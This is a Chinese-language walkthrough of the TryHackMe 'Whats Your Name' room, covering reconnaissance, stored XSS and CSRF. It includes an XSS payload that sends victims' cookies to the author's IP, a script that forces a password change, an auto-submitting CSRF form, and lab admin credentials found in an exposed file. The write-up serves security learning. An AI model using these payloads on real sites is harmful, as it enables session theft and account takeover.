THM Whats Your Name WP

信息收集

[2025-08-28 21:41:30] [SUCCESS] 端口開放 10.10.208.188:80[2025-08-28 21:41:30] [SUCCESS] 端口開放 10.10.208.188:22[2025-08-28 21:41:31] [SUCCESS] 端口開放 10.10.208.188:8081[2025-08-28 21:41:31] [SUCCESS] 服務識別 10.10.208.188:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.3 產品:OpenSSH 系統:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3.][2025-08-28 21:41:36] [SUCCESS] 服務識別 10.10.208.188:80 => [http][2025-08-28 21:41:36] [SUCCESS] 服務識別 10.10.208.188:8081 => [http][2025-08-28 21:41:36] [INFO] 存活端口數量: 3[2025-08-28 21:41:36] [INFO] 開始漏洞掃描[2025-08-28 21:41:36] [INFO] 加載的插件: ssh, webpoc, webtitle[2025-08-28 21:41:37] [SUCCESS] 網站標題 http://10.10.208.188 ? ?  狀態碼:200 長度:70 ? ? 標題:無標題[2025-08-28 21:41:38] [SUCCESS] 網站標題 http://10.10.208.188:8081 狀態碼:200 長度:70 ? ? 標題:無標題

添加映射關系

10.10.208.188 worldwap.thm

進去80端口注冊一個用戶后

繼續添加

10.10.208.188 login.worldwap.thm

版主flag

再訪問之后看一下返回包，提示訪問login.php

我們在這里可以發現

訪問后返回了一個cookie，而且沒有設置http-only屬性，這就可能造成cookie竊取，我們在注冊頁面測試一下，然后把之前的cookie刪除后訪問login.php

成功返回，那就把cookie給拿過來

<script>fetch('http://10.11.133.25/?'+btoa(document.cookie));</script>

進行base64解碼即可拿到對應cookie，我們再次訪問http://worldwap.thm/public/html/會被重定向到http://worldwap.thm/public/html/dashboard.php，同時訪問http://login.worldwap.thm/login.php會被重定向到http://login.worldwap.thm/profile.php

至此拿到了第一個flag

管理面板flag

非預期

呃，有非預期，那就是掃目錄發現了

[21:51:44] 200 - ?  5KB - /admin.py[21:52:05] 200 -  639B  - /assets/[21:52:05] 301 -  325B  - /assets  ->  http://login.worldwap.thm/assets/[21:52:14] 302 - ?  0B  - /chat.php  ->  login.php[21:52:23] 200 - ?  0B  - /db.php[21:52:47] 301 -  329B  - /javascript  ->  http://login.worldwap.thm/javascript/[21:52:53] 200 -  960B  - /login.php[21:52:54] 302 - ?  0B  - /logout.php  ->  login.php[21:52:54] 200 - ?  0B  - /logs.txt[21:53:12] 301 -  329B  - /phpmyadmin  ->  http://login.worldwap.thm/phpmyadmin/[21:53:15] 200 - ?  3KB - /phpmyadmin/doc/html/index.html[21:53:17] 200 - ?  3KB - /phpmyadmin/[21:53:17] 200 - ?  3KB - /phpmyadmin/index.php[21:53:20] 302 - ?  0B  - /profile.php  ->  login.php[21:53:28] 403 -  283B  - /server-status[21:53:28] 403 -  283B  - /server-status/[21:53:30] 200 - ? 96B  - /setup.php

admin.py里面有賬號密碼

# Admin credentials (for demonstration purposes)username = 'admin'password = 'Un6u3$$4Bl3!!'

直接登錄了

XSS

<script>alert(1)</script>

成功彈窗，現在可以說有兩個思路，一個拿cookie，一個改密碼

因為在改密碼界面發現請求包是

POST /change_password.php HTTP/1.1Host: login.worldwap.thmCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6779.57 Safari/537.36sec-ch-ua-mobile: ?0Accept-Language: zh-CN,zh;q=0.9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://login.worldwap.thm/change_password.phpOrigin: http://login.worldwap.thmCookie: PHPSESSID=7mm8j1r8iouk3n4c4sm18cp8kssec-ch-ua-platform: "Linux"Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="134", "Google Chrome";v="134"Content-Length: 19?new_password=123456

直接強制讓其改密，可以XSS，也可以CSRF實現

<script>fetch('/change_password.php',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:"new_password=123456"});</script>

CSRF

csrf更簡單，給他發送鏈接就行了，poc都可以一鍵生成，當然需要稍加修改，這個生成的不能自動發送，讓ai改一下就行

http://10.11.133.25/csrf.html?<html><body><form action="http://login.worldwap.thm/change_password.php" method="POST" name="form1" enctype="application/x-www-form-urlencoded"><input type="hidden" name="new_password" value="123456"/><input type="submit" value="Submit request" /></form><script>document.forms['form1'].submit();history.pushState('', '', '/');</script></body></html>

成功點擊訪問，修改密碼成功

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/diannao/97220.shtml
繁體地址，請注明出處：http://hk.pswp.cn/diannao/97220.shtml
英文地址，請注明出處：http://en.pswp.cn/diannao/97220.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！